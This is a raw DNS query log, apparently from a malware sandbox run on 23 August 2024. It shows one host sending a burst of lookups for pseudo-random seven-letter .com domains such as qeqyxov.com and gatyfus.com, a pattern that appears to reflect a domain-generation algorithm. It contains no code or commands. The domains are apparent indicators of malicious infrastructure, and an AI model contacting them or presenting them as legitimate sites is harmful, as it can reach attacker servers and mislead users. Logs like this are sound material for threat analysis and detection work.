Aug 23, 2024 18:42:11.914200068 CEST	192.168.2.5	1.1.1.1	0xe188	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.916968107 CEST	192.168.2.5	1.1.1.1	0x5487	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.917525053 CEST	192.168.2.5	1.1.1.1	0x8167	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.919367075 CEST	192.168.2.5	1.1.1.1	0x8858	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.920367956 CEST	192.168.2.5	1.1.1.1	0xb4a8	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.921528101 CEST	192.168.2.5	1.1.1.1	0x4556	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.927850008 CEST	192.168.2.5	1.1.1.1	0xae10	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.928078890 CEST	192.168.2.5	1.1.1.1	0xf08e	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.928476095 CEST	192.168.2.5	1.1.1.1	0xe072	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.928905010 CEST	192.168.2.5	1.1.1.1	0xec4e	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.930345058 CEST	192.168.2.5	1.1.1.1	0xbf0d	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.930876970 CEST	192.168.2.5	1.1.1.1	0x6249	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.021975994 CEST	192.168.2.5	1.1.1.1	0xc8ae	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.021975994 CEST	192.168.2.5	1.1.1.1	0xb19	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.034811974 CEST	192.168.2.5	1.1.1.1	0x79a3	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.162699938 CEST	192.168.2.5	1.1.1.1	0x75f5	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.182231903 CEST	192.168.2.5	1.1.1.1	0x4ac1	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.218218088 CEST	192.168.2.5	1.1.1.1	0xa264	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.246257067 CEST	192.168.2.5	1.1.1.1	0x3042	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.265959978 CEST	192.168.2.5	1.1.1.1	0xbe78	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.308962107 CEST	192.168.2.5	1.1.1.1	0x522b	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.323777914 CEST	192.168.2.5	1.1.1.1	0x4413	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.352338076 CEST	192.168.2.5	1.1.1.1	0xd24a	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.788942099 CEST	192.168.2.5	1.1.1.1	0x86fc	Standard query (0)	www.gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.829868078 CEST	192.168.2.5	1.1.1.1	0x4ef5	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.860035896 CEST	192.168.2.5	1.1.1.1	0xbe79	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:13.148118019 CEST	192.168.2.5	1.1.1.1	0xcbc7	Standard query (0)	ww1.lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:13.831069946 CEST	192.168.2.5	1.1.1.1	0x4ef5	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.809592962 CEST	192.168.2.5	1.1.1.1	0x19b7	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.754682064 CEST	192.168.2.5	1.1.1.1	0x208f	Standard query (0)	ganyzub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.754816055 CEST	192.168.2.5	1.1.1.1	0x82a6	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.755569935 CEST	192.168.2.5	1.1.1.1	0xf8c4	Standard query (0)	lykymox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.755990028 CEST	192.168.2.5	1.1.1.1	0xa565	Standard query (0)	vopydek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.757025957 CEST	192.168.2.5	1.1.1.1	0x34a8	Standard query (0)	qebylug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.757201910 CEST	192.168.2.5	1.1.1.1	0x8c2	Standard query (0)	pujymip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.758687019 CEST	192.168.2.5	1.1.1.1	0xc238	Standard query (0)	lyvylyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.758827925 CEST	192.168.2.5	1.1.1.1	0x7604	Standard query (0)	gatydaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.759686947 CEST	192.168.2.5	1.1.1.1	0xc232	Standard query (0)	vojymic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.760108948 CEST	192.168.2.5	1.1.1.1	0x4f58	Standard query (0)	qetysal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.761152029 CEST	192.168.2.5	1.1.1.1	0x290e	Standard query (0)	puvylyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.761385918 CEST	192.168.2.5	1.1.1.1	0x1f12	Standard query (0)	gahynus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.762650013 CEST	192.168.2.5	1.1.1.1	0xb155	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.762810946 CEST	192.168.2.5	1.1.1.1	0xeb4b	Standard query (0)	vocykem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.764213085 CEST	192.168.2.5	1.1.1.1	0x6675	Standard query (0)	purypol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.764225006 CEST	192.168.2.5	1.1.1.1	0x66c0	Standard query (0)	qegynuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.765619040 CEST	192.168.2.5	1.1.1.1	0x730a	Standard query (0)	gacykeh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.765774965 CEST	192.168.2.5	1.1.1.1	0xa803	Standard query (0)	lygynud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.767002106 CEST	192.168.2.5	1.1.1.1	0xfbff	Standard query (0)	vowypit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.768681049 CEST	192.168.2.5	1.1.1.1	0x7221	Standard query (0)	qexykaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.770087957 CEST	192.168.2.5	1.1.1.1	0x7912	Standard query (0)	gaqypiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.770482063 CEST	192.168.2.5	1.1.1.1	0x8405	Standard query (0)	lyxyjaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.771250010 CEST	192.168.2.5	1.1.1.1	0x3370	Standard query (0)	pufybyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.771867037 CEST	192.168.2.5	1.1.1.1	0xc839	Standard query (0)	vofybyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.773019075 CEST	192.168.2.5	1.1.1.1	0x661d	Standard query (0)	qeqytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.775746107 CEST	192.168.2.5	1.1.1.1	0x2292	Standard query (0)	puzyjoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.776587009 CEST	192.168.2.5	1.1.1.1	0xe4f8	Standard query (0)	gadyveb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.780153036 CEST	192.168.2.5	1.1.1.1	0x344b	Standard query (0)	lymytux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.780960083 CEST	192.168.2.5	1.1.1.1	0xb020	Standard query (0)	volyjok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.781413078 CEST	192.168.2.5	1.1.1.1	0x5133	Standard query (0)	pumytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.781856060 CEST	192.168.2.5	1.1.1.1	0xd349	Standard query (0)	galyhiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.786223888 CEST	192.168.2.5	1.1.1.1	0x5759	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.792860985 CEST	192.168.2.5	1.1.1.1	0x1c99	Standard query (0)	vonyryc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.793589115 CEST	192.168.2.5	1.1.1.1	0xdc5a	Standard query (0)	qekyhil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.794241905 CEST	192.168.2.5	1.1.1.1	0x4bfc	Standard query (0)	qedyveg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.796350956 CEST	192.168.2.5	1.1.1.1	0x7de6	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.797410965 CEST	192.168.2.5	1.1.1.1	0x8078	Standard query (0)	ganyrys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.801318884 CEST	192.168.2.5	1.1.1.1	0xaf44	Standard query (0)	lykygur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.802567959 CEST	192.168.2.5	1.1.1.1	0x5d03	Standard query (0)	vopycom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.802580118 CEST	192.168.2.5	1.1.1.1	0x95e8	Standard query (0)	qebyrev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.802793026 CEST	192.168.2.5	1.1.1.1	0x6dc7	Standard query (0)	pujygul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.802866936 CEST	192.168.2.5	1.1.1.1	0x48c3	Standard query (0)	gatycoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.803339958 CEST	192.168.2.5	1.1.1.1	0x7c64	Standard query (0)	lyvywed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.805644035 CEST	192.168.2.5	1.1.1.1	0x51cf	Standard query (0)	vojygut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.808006048 CEST	192.168.2.5	1.1.1.1	0x5b50	Standard query (0)	qetyxiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.808214903 CEST	192.168.2.5	1.1.1.1	0x893e	Standard query (0)	puvywav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.808969021 CEST	192.168.2.5	1.1.1.1	0xcd30	Standard query (0)	gahyfyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.809120893 CEST	192.168.2.5	1.1.1.1	0x7ce7	Standard query (0)	lyryxij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.809262991 CEST	192.168.2.5	1.1.1.1	0x8289	Standard query (0)	vocyqaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.810292006 CEST	192.168.2.5	1.1.1.1	0x49b4	Standard query (0)	qegyfyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.814004898 CEST	192.168.2.5	1.1.1.1	0x3d31	Standard query (0)	puryxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.814218044 CEST	192.168.2.5	1.1.1.1	0xa40c	Standard query (0)	gacyqob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.814363003 CEST	192.168.2.5	1.1.1.1	0xb9d4	Standard query (0)	lygyfex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.814519882 CEST	192.168.2.5	1.1.1.1	0x6bc1	Standard query (0)	vowyzuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.815675020 CEST	192.168.2.5	1.1.1.1	0x3f81	Standard query (0)	qexyqog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.815795898 CEST	192.168.2.5	1.1.1.1	0x8cbc	Standard query (0)	pufydep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.815866947 CEST	192.168.2.5	1.1.1.1	0xba1f	Standard query (0)	gaqyzuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.816051960 CEST	192.168.2.5	1.1.1.1	0xb893	Standard query (0)	lyxymin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.816205025 CEST	192.168.2.5	1.1.1.1	0x284a	Standard query (0)	vofydac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.816545963 CEST	192.168.2.5	1.1.1.1	0x69e6	Standard query (0)	qeqylyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.816751957 CEST	192.168.2.5	1.1.1.1	0xfd22	Standard query (0)	gadydas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.817131996 CEST	192.168.2.5	1.1.1.1	0x53ea	Standard query (0)	puzymig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.817142963 CEST	192.168.2.5	1.1.1.1	0x8a9c	Standard query (0)	lymylyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.817332029 CEST	192.168.2.5	1.1.1.1	0x90ba	Standard query (0)	volymum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.842693090 CEST	192.168.2.5	1.1.1.1	0xd5ce	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:26.849056959 CEST	192.168.2.5	1.1.1.1	0xa2f9	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:26.895078897 CEST	192.168.2.5	1.1.1.1	0x2e05	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:26.953829050 CEST	192.168.2.5	1.1.1.1	0xc8ca	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.243261099 CEST	192.168.2.5	1.1.1.1	0x70c9	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.243829012 CEST	192.168.2.5	1.1.1.1	0xe615	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.246743917 CEST	192.168.2.5	1.1.1.1	0xe76a	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.247584105 CEST	192.168.2.5	1.1.1.1	0xb6cb	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.247940063 CEST	192.168.2.5	1.1.1.1	0xa2ce	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.248128891 CEST	192.168.2.5	1.1.1.1	0x5610	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.249479055 CEST	192.168.2.5	1.1.1.1	0x83f8	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.249687910 CEST	192.168.2.5	1.1.1.1	0xa7c6	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.251071930 CEST	192.168.2.5	1.1.1.1	0xaf69	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.251209974 CEST	192.168.2.5	1.1.1.1	0x523a	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.252640009 CEST	192.168.2.5	1.1.1.1	0xff6d	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.253722906 CEST	192.168.2.5	1.1.1.1	0x6fed	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.253905058 CEST	192.168.2.5	1.1.1.1	0xccd7	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.255275011 CEST	192.168.2.5	1.1.1.1	0xb3a4	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.255539894 CEST	192.168.2.5	1.1.1.1	0x573c	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.256755114 CEST	192.168.2.5	1.1.1.1	0xa3e8	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.257002115 CEST	192.168.2.5	1.1.1.1	0x3eb3	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.258116007 CEST	192.168.2.5	1.1.1.1	0xafc3	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.258718967 CEST	192.168.2.5	1.1.1.1	0x3d6d	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.259702921 CEST	192.168.2.5	1.1.1.1	0xbf47	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.261390924 CEST	192.168.2.5	1.1.1.1	0x47fe	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.261635065 CEST	192.168.2.5	1.1.1.1	0x3892	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.262933016 CEST	192.168.2.5	1.1.1.1	0x9747	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.263158083 CEST	192.168.2.5	1.1.1.1	0xccad	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.263942003 CEST	192.168.2.5	1.1.1.1	0x5fd7	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.269722939 CEST	192.168.2.5	1.1.1.1	0x378b	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.271737099 CEST	192.168.2.5	1.1.1.1	0xc9a1	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.272124052 CEST	192.168.2.5	1.1.1.1	0xde5e	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.273834944 CEST	192.168.2.5	1.1.1.1	0x934f	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.295116901 CEST	192.168.2.5	1.1.1.1	0x52a2	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.295344114 CEST	192.168.2.5	1.1.1.1	0x83b3	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.296622992 CEST	192.168.2.5	1.1.1.1	0x7ddc	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.303370953 CEST	192.168.2.5	1.1.1.1	0x5536	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.312021971 CEST	192.168.2.5	1.1.1.1	0x1ac0	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.312571049 CEST	192.168.2.5	1.1.1.1	0x1ef4	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.319834948 CEST	192.168.2.5	1.1.1.1	0xc04d	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.322918892 CEST	192.168.2.5	1.1.1.1	0x9f84	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.323081970 CEST	192.168.2.5	1.1.1.1	0x46ef	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.323215961 CEST	192.168.2.5	1.1.1.1	0x2feb	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.324218035 CEST	192.168.2.5	1.1.1.1	0x3ed5	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.337553978 CEST	192.168.2.5	1.1.1.1	0x31f4	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.337686062 CEST	192.168.2.5	1.1.1.1	0x862e	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.337872982 CEST	192.168.2.5	1.1.1.1	0xebb4	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.340368986 CEST	192.168.2.5	1.1.1.1	0x9f55	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.345644951 CEST	192.168.2.5	1.1.1.1	0xa220	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.346046925 CEST	192.168.2.5	1.1.1.1	0x7f27	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.347157001 CEST	192.168.2.5	1.1.1.1	0x4a0e	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.347326994 CEST	192.168.2.5	1.1.1.1	0x62bc	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.348079920 CEST	192.168.2.5	1.1.1.1	0x69b8	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.348501921 CEST	192.168.2.5	1.1.1.1	0xf8a9	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.348767042 CEST	192.168.2.5	1.1.1.1	0xb378	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.353976011 CEST	192.168.2.5	1.1.1.1	0xcd97	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.354177952 CEST	192.168.2.5	1.1.1.1	0x1d5c	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.354336023 CEST	192.168.2.5	1.1.1.1	0xbe2d	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.354563951 CEST	192.168.2.5	1.1.1.1	0x82f	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.364069939 CEST	192.168.2.5	1.1.1.1	0xe2c3	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.364905119 CEST	192.168.2.5	1.1.1.1	0xcde0	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.366024017 CEST	192.168.2.5	1.1.1.1	0xb314	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.366199017 CEST	192.168.2.5	1.1.1.1	0x8b0e	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.413038015 CEST	192.168.2.5	1.1.1.1	0xe25	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.426059008 CEST	192.168.2.5	1.1.1.1	0x29aa	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.431071997 CEST	192.168.2.5	1.1.1.1	0xbcaf	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.431472063 CEST	192.168.2.5	1.1.1.1	0xda5b	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.436712980 CEST	192.168.2.5	1.1.1.1	0x9362	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.781722069 CEST	192.168.2.5	1.1.1.1	0xf27c	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.100848913 CEST	192.168.2.5	1.1.1.1	0x7d40	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.101772070 CEST	192.168.2.5	1.1.1.1	0xf373	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.102726936 CEST	192.168.2.5	1.1.1.1	0x198e	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.103014946 CEST	192.168.2.5	1.1.1.1	0xf6c6	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.104527950 CEST	192.168.2.5	1.1.1.1	0xad7d	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.104527950 CEST	192.168.2.5	1.1.1.1	0x8b01	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.105776072 CEST	192.168.2.5	1.1.1.1	0xd125	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.105776072 CEST	192.168.2.5	1.1.1.1	0xbf26	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.106292963 CEST	192.168.2.5	1.1.1.1	0x7eb7	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.106292963 CEST	192.168.2.5	1.1.1.1	0x5e60	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.107280970 CEST	192.168.2.5	1.1.1.1	0xfeeb	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.107610941 CEST	192.168.2.5	1.1.1.1	0x9fa	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.108551025 CEST	192.168.2.5	1.1.1.1	0x759b	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.108724117 CEST	192.168.2.5	1.1.1.1	0x9b9f	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.109986067 CEST	192.168.2.5	1.1.1.1	0xd17d	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.109986067 CEST	192.168.2.5	1.1.1.1	0xff2d	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.111454964 CEST	192.168.2.5	1.1.1.1	0x5f9	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.111629963 CEST	192.168.2.5	1.1.1.1	0xcc42	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.112584114 CEST	192.168.2.5	1.1.1.1	0xb5e9	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.112584114 CEST	192.168.2.5	1.1.1.1	0x6a22	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.113893032 CEST	192.168.2.5	1.1.1.1	0x11f5	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.114197969 CEST	192.168.2.5	1.1.1.1	0xd957	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.115365028 CEST	192.168.2.5	1.1.1.1	0xcb15	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.116199970 CEST	192.168.2.5	1.1.1.1	0xbc6d	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.137049913 CEST	192.168.2.5	1.1.1.1	0x32b	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
